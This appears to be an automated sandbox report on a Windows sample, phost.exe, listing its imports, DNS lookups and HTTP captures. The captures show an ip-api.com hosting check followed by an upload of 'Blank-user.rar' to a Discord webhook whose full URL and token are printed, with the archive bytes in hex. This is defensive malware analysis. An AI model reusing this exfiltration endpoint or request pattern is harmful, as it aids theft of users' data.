                                                                                                                                                                                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.230992079 CET4973180192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.350903988 CET8049731208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.351010084 CET4973180192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.351142883 CET4973180192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.470921993 CET8049731208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:41:48.512181997 CET8049731208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:41:48.520612001 CET4973180192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:48.641140938 CET8049731208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:41:48.642779112 CET4973180192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:49.208304882 CET8049731208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:41:49.208439112 CET4973180192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:49.328583956 CET8049731208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.797750950 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.917622089 CET8049744208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.917743921 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.917862892 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:27.037640095 CET8049744208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.033027887 CET8049744208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.074959993 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.354499102 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.354542971 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.354615927 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.385469913 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.385550022 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.765423059 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.766010046 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.766048908 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.767750025 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.767828941 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.769478083 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.769583941 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.769779921 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.769790888 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.769848108 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.769877911 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770032883 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770070076 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770374060 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770423889 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770591021 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770611048 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770633936 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770653963 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770682096 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770701885 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770797968 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770812035 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770814896 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770824909 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770827055 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770839930 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770878077 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770890951 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771024942 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771037102 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771054983 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771063089 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771074057 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771080971 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771095991 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771111965 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771131992 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771141052 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771150112 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771155119 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771167040 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771173954 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771190882 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771198034 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771219015 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771228075 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771240950 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771254063 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771372080 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771380901 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771401882 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771414995 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771425962 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771486044 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771509886 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771554947 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771593094 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771635056 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771687031 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771694899 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771720886 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771750927 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771769047 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771790981 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771852970 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771902084 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771960974 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771986008 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819338083 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819545031 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819628954 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819679976 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819699049 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819740057 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819758892 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819789886 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819804907 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819828033 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819840908 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819909096 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819909096 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819942951 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819983006 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.820015907 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.867343903 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.282226086 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.282422066 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.282615900 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.283201933 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.293102980 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.413587093 CET8049744208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.413657904 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Dec 13, 2024 08:41:45.249258041 CET5813853192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:45.465985060 CET53581381.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.088649988 CET5324853192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.226730108 CET53532481.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.657067060 CET6372153192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.796803951 CET53637211.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.215502977 CET5749353192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.352855921 CET53574931.1.1.1192.168.2.4
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Dec 13, 2024 08:41:45.249258041 CET192.168.2.41.1.1.10x214bStandard query (0)blank-c9yfy.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.088649988 CET192.168.2.41.1.1.10xe0a4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.657067060 CET192.168.2.41.1.1.10x17f8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.215502977 CET192.168.2.41.1.1.10x6fb6Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Dec 13, 2024 08:41:45.465985060 CET1.1.1.1192.168.2.40x214bName error (3)blank-c9yfy.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.226730108 CET1.1.1.1192.168.2.40xe0a4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.796803951 CET1.1.1.1192.168.2.40x17f8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.352855921 CET1.1.1.1192.168.2.40x6fb6No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.352855921 CET1.1.1.1192.168.2.40x6fb6No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.352855921 CET1.1.1.1192.168.2.40x6fb6No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.352855921 CET1.1.1.1192.168.2.40x6fb6No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.352855921 CET1.1.1.1192.168.2.40x6fb6No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            • discord.com
                                                                                                                                                                                                                            • ip-api.com
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449731208.95.112.1803444C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 13, 2024 08:41:47.351142883 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Dec 13, 2024 08:41:48.512181997 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 Dec 2024 07:41:48 GMT
                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                            Data Ascii: false


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.449744208.95.112.1803444C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 13, 2024 08:42:26.917862892 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Dec 13, 2024 08:42:28.033027887 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 Dec 2024 07:42:27 GMT
                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 204
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449745162.159.137.2324433444C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC302OUTPOST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1
                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            Content-Length: 759276
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=d86edcfe5e1bf83a434b434f5a1b347a
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 2d 2d 64 38 36 65 64 63 66 65 35 65 31 62 66 38 33 61 34 33 34 62 34 33 34 66 35 61 31 62 33 34 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 de eb b5 67 21 04 00 00 01 0f 67 77 84 d7 b5 56 9b 51 26 88 79 21 75 78 ed 36 be 0b 94 7f 82 68 30 a2 18 b5 6e 9c 56 60 00 ba d2 ca a8 d0 a2 a3 55 c4 4a 72 45 94 0e d5 e7 ac 44 24 c0 3c 4b 6d bd 5c 6a 6e ce 8f b5 36 79 b9 4b 84 e4 c4 09 1c 72 22 6b b4 4b 03 8a ef dc 91 f2 79 40 14 18 8f
                                                                                                                                                                                                                            Data Ascii: --d86edcfe5e1bf83a434b434f5a1b347aContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!g!gwVQ&y!ux6h0nV`UJrED$<Km\jn6yKr"kKy@
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 9a de 61 ac 51 e2 84 6d 67 99 e8 50 b9 e0 61 f0 7a 2f cf 50 12 cf 6b 8c 84 e8 63 86 b7 e3 57 7f dd aa 22 90 bb 80 72 87 20 c9 c3 20 43 ac ca 9d f1 ac 30 3a 6f 09 49 e6 48 ad 07 4a 7a b6 f5 59 ed 6b fd c4 16 4a ba 9f cf e3 f2 9a 5b b1 4f bd 8c 61 51 f2 16 fa cc 00 b0 06 01 ac 61 7e 72 63 6a c4 5a db a4 67 d0 0a 9c 2e bb a0 16 2d 77 8a 0b 2b 8a 18 65 7f 28 48 ad 5c 99 3f 89 d7 2d 34 fd 3c ba 1b da 17 b2 1e e4 15 e9 c4 5b 4e 16 7c 08 3b 1f 3b 94 1e 40 a6 58 b6 70 f2 58 1a c4 0a 70 f5 93 79 95 6a 3d 4b ee 27 c4 6e 52 3d 54 69 72 d6 28 61 f9 23 68 f8 bd bc 4f 2b e1 10 4e 15 2e f6 87 54 f5 0b 46 e6 70 7a f0 c5 38 df 31 04 d0 b3 8c a6 b4 c2 01 a2 32 85 3c be 0f 5c c6 68 0d ed 3c c2 f4 85 b6 6a e4 e4 98 87 39 89 ce ea 5c a3 f8 e9 88 e6 bb 4b 92 38 43 49 b2 e2 87
                                                                                                                                                                                                                            Data Ascii: aQmgPaz/PkcW"r C0:oIHJzYkJ[OaQa~rcjZg.-w+e(H\?-4<[N|;;@XpXpyj=K'nR=Tir(a#hO+N.TFpz812<\h<j9\K8CI
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 06 71 80 05 1d 32 29 b8 ae b5 72 cc b4 a1 81 49 96 83 7f 63 85 94 cf 63 e8 7b ea b6 e0 31 9f b6 fa a3 e2 60 da ef 2f 5d e2 0f 3d f0 dc eb 2b 28 36 c7 17 2b 97 82 bf 97 f7 f3 d1 86 2d 78 be c2 36 e1 e8 b9 8f 3e a8 2a 64 2c 4c 61 33 e2 53 46 59 5a 18 ad a2 49 1d af dd 55 6f 9e 73 ca d9 10 cb 4a 84 16 5f 5a 35 09 d5 dc be 38 99 2f b9 91 ab 0f c1 23 78 34 32 f7 51 ad e8 4e 35 c2 54 e9 0a 7d 6e a4 cd 2d a2 61 a4 e9 d7 ce db 1a 2f 77 3e 7a 2f b2 c5 27 77 f4 fc a1 ad 33 d5 03 37 4d 80 30 30 eb a6 dc 23 51 11 a7 87 e1 8d 4f 47 df d1 61 2e 97 6e 46 83 ec ef 44 5d ae ce d0 e6 23 3c 8b fe a0 6b 73 5d 91 24 02 0b b1 79 36 62 fb 25 81 38 c2 ea 43 ed d4 d4 b1 cc 12 09 2b 7c 0e 59 10 21 7a 2e 07 f1 8e 0a 8e 76 ac 10 ce 67 dc c0 df 1c 4a 78 1e 9c b9 9d f5 dc 95 5d b8 e0
                                                                                                                                                                                                                            Data Ascii: q2)rIcc{1`/]=+(6+-x6>*d,La3SFYZIUosJ_Z58/#x42QN5T}n-a/w>z/'w37M00#QOGa.nFD]#<ks]$y6b%8C+|Y!z.vgJx]
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: a8 9f 5b 57 ea 84 8f 9b 96 53 7e 1d e9 9e 7d 43 b0 21 a9 01 15 81 90 b8 23 e6 63 72 ce ca 8b 3d fd 79 ca 50 25 11 37 31 3e 96 b3 b3 e6 9c fa db af ff 16 d6 3a 17 24 0a 24 b0 d5 45 7c 03 7a be 6f 28 95 6a ed 1d e0 58 57 78 4a fc 5b 17 7f 08 90 c5 84 73 35 cc 6d 71 05 b7 c5 de a3 51 ca ff b9 c4 dc 47 98 0f 87 8e a0 64 07 d8 b9 1e 04 0a 17 a7 06 0e d9 19 85 6b fb c6 fc 33 45 a2 2d 1d cf 2a ff 14 be 2c df 2b be 5f 71 d1 7b e3 a2 48 45 b4 8c 31 ef 1e 90 04 b4 43 34 5e 59 0e 6c 13 60 90 e3 41 2c 36 1e ca 5c 01 71 d8 a2 69 25 8f f3 8c 82 00 f3 05 75 de a4 2e c8 c3 b5 e5 a6 22 9a 8e 04 c9 8d 67 ad 36 81 1b 67 1e 26 b7 7d 19 43 80 1c a7 49 5b 8a 9f 70 32 c0 2f 62 3b 3e 0e 7c b9 8e 7b f7 b8 a3 20 98 51 65 ed db 8d ed b0 4b 20 f1 00 5d 13 cb 75 ca c9 a0 c7 59 4d 0f
                                                                                                                                                                                                                            Data Ascii: [WS~}C!#cr=yP%71>:$$E|zo(jXWxJ[s5mqQGdk3E-*,+_q{HE1C4^Yl`A,6\qi%u."g6g&}CI[p2/b;>|{ QeK ]uYM
